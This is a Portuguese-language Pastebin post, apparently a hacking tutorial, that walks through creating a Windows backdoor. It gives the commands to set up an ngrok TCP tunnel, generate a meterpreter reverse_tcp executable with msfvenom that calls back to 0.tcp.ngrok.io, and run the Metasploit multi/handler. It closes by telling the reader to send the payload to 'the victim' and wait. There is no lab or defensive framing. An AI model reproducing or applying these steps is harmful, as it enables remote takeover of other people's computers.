Advertisement
syst3m_h4x0r

Backdoor Msfconsole Ngrok

Jun 19th, 2018
24,391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.73 KB | None | 0 0
  1. 1) Fazendo o download.
  2. - Acesse o link de download e escolha a opção mais adequada para você
  3. https://ngrok.com/download
  4. 2) Registrando e autenticando
  5. - Crie sua conta do ngrok aqui, apenas coloque seu email, um usuário e uma senha.
  6. - Após registrar sua conta você recebera um código de autenticação, você pode ver seu codigo aqui.
  7. https://dashboard.ngrok.com/auth
  8. - Após ter baixado o ngrok digite o comando:
  9. ./ngrok authtoken <seu-codigo-de-autenticacao>
  10. - O programa estará pronto para uso
  11. 3) Usando ngrok para conexão reversa:
  12. - Para usar em uma backdoor por exemplo você utilizara uma conexão tcp:
  13. ./ngrok tcp 1337
  14. http://prntscr.com/j5ezrr
  15.  
  16. - A conexão foi estabelecida agora vamos criar a backdoor:
  17. * O LHOST será este ip:
  18.  
  19.  
  20. https://prnt.sc/j5f04q
  21.  
  22. * E o LPORT para cada usuário sera diferente EX:
  23.  
  24.  
  25. http://prntscr.com/j5f0hl
  26.  
  27. * Agora é so rodar o msfvenom com o ip e porta (obs: coloquei o payload para windows mais vc pode usar o de sua preferência )
  28.  
  29. ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=porta-do-ngrok -f exe > backdoor
  30. http://prntscr.com/j5f0va
  31.  
  32. 4) Escutando a conexão:
  33. - Após a backdoor ser criada vamos iniciar o handler:
  34. * IMPORTANTE: para escutar a conexão a porta e o host serão DIFERENTES do payload;
  35. A porta será a que você colocou no inicio no ngrok, no meu caso 1337
  36. O host sempre será 127.0.0.1 ou 0.0.0.0 ou localhost, de qualquer jeito será seu ip LOCAL.
  37.  
  38.  
  39. https://prnt.sc/j5f231
  40.  
  41.  
  42. https://prnt.sc/j5f1yp
  43.  
  44.  
  45. - Configurado o handler basta escutar a conexão com
  46. msf exploit(multi/handler) > run
  47. ou
  48. msf exploit(multi/handler) > exploit
  49. - Depois de enviado o payload para a vítima é so esperar a conexão!
  50.  
  51.  
  52. https://prnt.sc/j5f2s6
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement